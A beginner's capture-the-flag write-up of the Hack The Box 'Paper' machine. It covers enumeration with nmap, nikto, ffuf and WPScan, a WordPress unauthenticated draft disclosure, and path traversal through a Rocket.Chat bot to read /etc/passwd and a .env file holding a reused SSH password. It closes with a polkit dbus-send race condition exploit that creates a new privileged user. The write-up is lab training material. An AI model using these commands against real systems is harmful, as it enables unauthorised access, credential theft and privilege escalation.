Hackthebox Paper-Write up
Alright so this is going to be my first ever hack the box write up, so cut me some slack, it might be a little rough around the edges.
Paper is an easy Linux machine that proves the importance of keeping an eye on the news, but also following basic methodology and not over complicating everything.
A dramatic principle that states that every element in a story must be necessary. — Chekov's gun
Lets get to the enumeration!
nmap -sV -A -O -p- 10.129.106.243
We find three ports being open, i.e., Port 22, 80 and 443. Because we are working on a box, and SSH is generally secure, we can assume that it will be used later for initial access and persistence.
A good practice is to run a UDP scan as well.
nmap -sC -sV -sU 10.129.106.243
We take note of the port and continue with discovery.
When dealing with web servers, one of the best tools you can use is Nikto, this tool will scan the web server for low hanging fruit. It takes some time, so it is good practice to start this up at the beginning of your enumeration and let it run whilst you discover more information through other methods.
nikto -h http://10.129.106.243
After sometime, a piece of information stands out…
office.paper is found to be the servers domain name, which is out of the usual naming convention of boxname.htb, either way we modify our /etc/hosts file with the appropriate entry.
:wq #or kill your VM to exit vi:)
Alright lets see what's behind this name.
From the looks of it, a paper company? That only seems to have blog posts.
At this point we should ask ourselves a few questions:
1. What resources/files/folders exist here that we may not see?
2. How secure is the web server in use?
3. How secure are the inputs we see?
4. What technology is used? i.e. CMS, plugins, themes, etc?
These are basic questions that need to be answered when doing a web application pen test, Take that with a grain of salt though, as their are many other components of a web pen test and all of them vary per person.
To answer question 1, we are going to be using Ffuf for our file and directory brute forcing, the tool you use is down to preference. Gobuster, wfuzz or even Burp intruder(pro please) does the trick.
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://office.paper/FUZZ
NOTE: If you need a good set of wordlists, Daniel Miessler’s SecLists is a must have, you can clone the repo if you haven't already.
After a while we see wp-content pop up in our output. This is a great giveaway to us that the website dev used WordPress as his/her CMS(Content management system). Time to bring out WPScan.
WPScan is great security scanner for WordPress, it contains a variety of testing, including a built in vulnerability scanner, However in order to use this feature, you have to create an account with WPScan to receive an API token that you can use in your scan. To create an account follow the link below.
After which you will be taken to your dashboard where you will see your token.
Now that’s out the way, lets start our scan!
We use the enumerate flag as well two options for it, p & u, p is popular plugins and u is User ID enumeration, we also set the mode for plugin detection to be aggressive, this by default is passive.
wpscan — url http://office.paper/ — api-token <TOKEN HERE> — enumerate p,u — plugins-detection aggressive
While that's running I take some time to take a leisurely stroll through the website, as I said earlier the website just contained blog posts, so we will be looking for any information that helps us narrow our attack surface.
Going through the few posts that are present we see something very interesting.
It looks like Nick is the one who should be worrying about security here…
Anyway, he points out that there is secret content in Michael’s drafts. We see a similar post when searching for Michael in the search bar.
This seems very interesting, and is likely our way in. We earmark this for later and continue digging.
Lets jump back to our WPScan!
Taking a look at the output, something glares at us.
WordPress < = 5.2.3 — Unauthenticated view private/draft posts.
Now where did I see drafts again…
Ahh that’s right, our friend Nick!, if you remember, Nick said that Michael stores secrets in his drafts and that he needs to delete them, how convenient.
We do some reading through the articles referenced in WPScan and find a great POC here:
Following the article we amend a ?static=1 to our URL, leading to a disclosure of a draft containing a URL to a private chat.
Lets add this to our /etc/hosts file and check it out!
Alright let’s take this up a notch.
We are presented with a rocket chat room, and we are prompted to make an account, once this is done we are given access to threads that the employees of this paper company have access to.
We go ahead and make an account
email@example.com : password
After signing in, click on the directory button and then on general.
You should now see the general chat.
Reading through the blog, its observed that a new bot has been added to the channel called recyclops created by Dwight. Dwight mentions that you can see a list of valid commands for this bot by typing “recyclops help”.
We open a private chat with the bot as our first step.
Using the help command displays the list below:
The bot command that grabs my attention is the file command.
This command allows us to display or cat out the content of a file within the limitations of the /home/Dwight/sales/sale folder, however this does not validate correctly and can be exploited to disclose information from other files.
After some time messing around with the positioning of my input, I finally get the bot to disclose /etc/passwd, I do this by inputting the path to a valid file first, which is sale/portfolio.txt and then inputting a path to another file on the system, in this case /etc/passwd. our final command looks as follows:
recyclops file sale/portfolio.txt /etc/passwd
#take note of the space
Awesome! now we can read files.
If you remember what the help command said earlier, you would have noticed a list command as well, this functions as ls. You can use this in the same manner as above to list directories outside of just sales.
recyclops list sale /home
Again take note of the space.
The above command will return the home directory.
Now that we have both ls and cat at our disposal, we can do some digging!
We look through Dwight’s home directory and we find an interesting directory called hubot.
we list out the directory and see a file is known for having important information contained in it, i.e. .env file
We use the file command to cat out this file through the bot.
recyclops file sale/portfolio.txt /home/dwight/hubot/.env
Nice! A password. I Initially had spent way too much time ignoring this, but lets not forget that passwords can be reused AND that SSH is open! lets try our luck…
User flag can be found in /home/dwight
Okay as much user is great, we need root, so back to the grind!
This is the portion that confused a lot of people simply because it involved an exploit that was quite recent, once the exploit is found, the way to root is pretty straight forward…
It is good practice to run LinPeas to get good overview of the machine you're on, it not only shows you any privilege escalation vectors but also gives you and idea of the technologies used on the box.
First things first is to copy over the linpeas.sh script to Dwight.
We set up a server on our machine in the folder that linpeas is located in.
python -m SimpleHTTPServer 80
Next we download that script from our victims SSH session, aka; Dwight.
Lets make this bad boy executable…
chmod +x linpeas.sh
Now we are set to run the script.
Observing the output rolling by, my eyes catch something familiar from the news recently.
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems
The specific article that this reminded me off was:
However the bug in this article was leveraging pkexec to exploit the vulnerability, which we could not replicate because of the lack of the root SUID bit being set for pkexec.
However in my research I came across an article that instead uses “dbus-send” to interact with polkit instead.
The vulnerability is triggered by starting a
dbus-sendcommand but killing it while polkit is still in the middle of processing the request
Alright so lets try this…
I make the first dbus send as follows:
dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1
This will create the user boris.
Take note of the UID as you will need it for the next command.
Immediately after you confirm that the user exists run the next command:
This will create a password for the boris, however the password will need to be hashed first, which can easily be accomplished with openssl.
#create hashed password
openssl passwd -5 mynamejeff
$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0#Dbus send to set password for boris
dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:’$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0’ string:GoldenEye & sleep 0.008s ; kill $!
Immediately after this is done, try to switch user to the one you just created.
Alright now, lets try to elevate to root from our boris user.
If you’ve made it this far, well thanks for reading.
Remember to never stop learning and always keep hacking!